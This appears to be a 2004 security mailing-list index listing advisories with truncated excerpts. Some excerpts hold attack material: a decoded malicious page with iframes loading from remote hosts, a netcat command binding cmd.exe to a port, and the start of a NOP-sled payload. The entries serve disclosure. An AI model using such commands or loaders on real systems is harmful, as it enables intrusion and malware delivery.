MDKSA-2004:161 - Updated xpdf packages fix buffer overflow vulnerability
2004-12-30 Mandrake Linux Security Team (security linux-mandrake com)

MDKSA-2004:160 - Updated kdelibs packages fix konqueror email vulnerability
2004-12-30 Mandrake Linux Security Team (security linux-mandrake com)

Strange Java Loader
2004-12-30 duffbeer (duffbeer gmx net)
Hi People, before reading this, don't go on any of the sites unless you are sure ;) after decrypting some stuff, this is the source from: http://xxl-size.com/cogo.html
-------------------------------------
<iframe src="http://209.8.20.130/dl/adv346.php">
<iframe src="http://www.awmcash.biz/adverts/

[SECURITY] [DSA 620-1] New perl packages fix several vulnerabilities
2004-12-30 joey infodrom org (Martin Schulze)

NetCat V 1.11 Multiple Bugs
2004-12-30 CorryL (corryl80 gmail com)
Hello the nc V1.11 is bugged execute nc -p 777 -L -e cmd.exe create the file prova.txt and insert
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x

KorWeblog php injection Vulnerability
2004-12-30 Min-sung Choi (mins fsu or kr)
KorWeblog php injection Vulnerability
Release Date : 2004/12/31 (KST)
Author : Mins (mins at fsu.or.kr)
Product : KorWeblog http://weblog.kldp.org
Vendor-Status: Vendor was contacted but I could not receive reply message.
Vendor-Patches: None
Impact: Attacker can execute arbitrary php code

[ GLSA 200412-26 ] ViewCVS: Information leak and XSS vulnerabilities
2004-12-28 Thierry Carrez (koon gentoo org)

Sanity Worm Concepts
2004-12-29 Andy Fewtrell (afsec throwaway coldfyre net) (1 replies)
I was writing some new rules for mod_security (http://www.modsecurity.org) to try and trap other methods that this sanity worm might try to exploit later. Unfortunately the ideas I came up with are slightly worrying with how easily this worm could actually spread. Right now the sanity worm uses pe

QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004]
2004-12-29 Julio Cesar Fort (julio rfdslabs com br)

php-Calendar File Include Vulnerability [ Command Exec ]
2004-12-29 GulfTech Security (security gulftech org)
##########################################################
# GulfTech Security Research December 28th, 2004
##########################################################
# Vendor : Sean Proctor
# URL : http://php-calendar.sourceforge.net/
# Version : All Versions
# Risk : File Include V

[CLA-2004:909] Conectiva Security Announcement - netpbm
2004-12-29 Conectiva Updates (secure conectiva com br)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------ --
CONECTIVA LINUX SECURITY ANNOUNCEMENT
- ------------------------------------------------------------------------ --
PACKAGE : netpbm
SUMMARY : Insecure temporary file crea

Re: Microsoft Windows LoadImage API IntegerBuffer overflow
2004-12-25 Berend-Jan Wever (skylined edup tudelft nl)
Since the exploit published by flashsky is a rip off of my IE exploit script published in the IFRAME exploit, it will probably be caught by some IDS/AV signatures as being the IFRAME exploit.
Cheers, SkyLined
> > This vul can be exploited, at
> http://www.xfocus.net/flashsky/icoExp/index.htm

XSA-2004-7: stack overflow in AIFF demultiplexer
2004-12-26 Michael Roitzsch (mroi users sourceforge net)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
xine security announcement
==========================
Announcement-ID: XSA-2004-7
Summary: A stack buffer overflow vulnerability in the AIFF demultiplexer has been found by Ariel Berkman and was reported to the xine team by D. J. Bernstein. This can

Netcat v1.11 For Windows , New fixed version
2004-12-29 Hat-Squad Security Team (bugtraq hat-squad com)

[HAT-SQUAD] NetCat Remote Critical Vulnerability, Poc included
2004-12-27 Hat-Squad Security Team (bugtraq hat-squad com) (1 replies)
December 26, 2004
Hat-Squad Advisory: Remote buffer overflow in Netcat TCP/IP Swiss Army Knife
Product: Netcat - nc11nt.zip
Vendor Url: http://www.securityfocus.com/tools/139/scoreit
Version: Netcat v1.1
Vulnerability: Remote stack overflow in the DNS control part
Release Date: 26 December,

Re: [HAT-SQUAD] NetCat Remote Critical Vulnerability, Poc included
2004-12-28 Chris Wysopal (weld vulnwatch org)

Remote code execution with parameters without user interaction, even with XP SP2
2004-12-28 ShredderSub7 SecExpert (shreddersub7 hotmail com)
PoC (called CMDExe): http://www.freewebs.com/shreddersub7/htm.htm
Discussion: http://www.freewebs.com/shreddersub7/expl-discuss.htm
------------------Which systems are vulnerable?--------
Any system running any Microsoft Windows XP edition with Internet Explorer 6 or higher, even with SP2 applied.

Multiple WHM Autopilot Vulnerabilities
2004-12-28 GulfTech Security (security gulftech org)
##########################################################
# GulfTech Security Research December 28th, 2004
##########################################################
# Vendor : Benchmark Designs, LLC
# URL : http://www.whmautopilot.com/
# Version : WHM AutoPilot v2.4.6.5 && Others [All

Did a 16-bit counter overflow shut down Comair?
2004-12-28 Richard M. Smith (rms computerbytesman com) (2 replies)
Hi, On Christmas Day last Saturday, Comair Airlines had to completely stop flying all of its planes due to computer problems. Comair blamed the computer problems on their pilot scheduling software being overloaded after bad weather earlier in the week forced many flights to be rescheduled. Comair

Re: Did a 16-bit counter overflow shut down Comair?
2004-12-29 Avleen Vig (lists-bugtraq silverwraith com)

possible error in latest NGS realplayer advisory
2004-12-28 Marc Bejarano (bugtraq beej org)
since my emails to research (at) ngssoftware (dot) com appear to go in a black hole, i'm posting here. they seem to at least read my emails that make it here :)
marc
=====
Date: Thu, 02 Dec 2004 22:14:16 -0400
To: research (at) ngssoftware (dot) com
From: Marc Bejarano <censored>
Subject: error in latest realplayer ad

MDKSA-2004:158 - Updated samba packages fix integer overflow vulnerabilities
2004-12-27 Mandrake Linux Security Team (security linux-mandrake com)
Hash: SHA1
_______________________________________________________________________
Mandrakelinux Security Update Advisory
_______________________________________________________________________
Package name: xpdf
Advisory ID: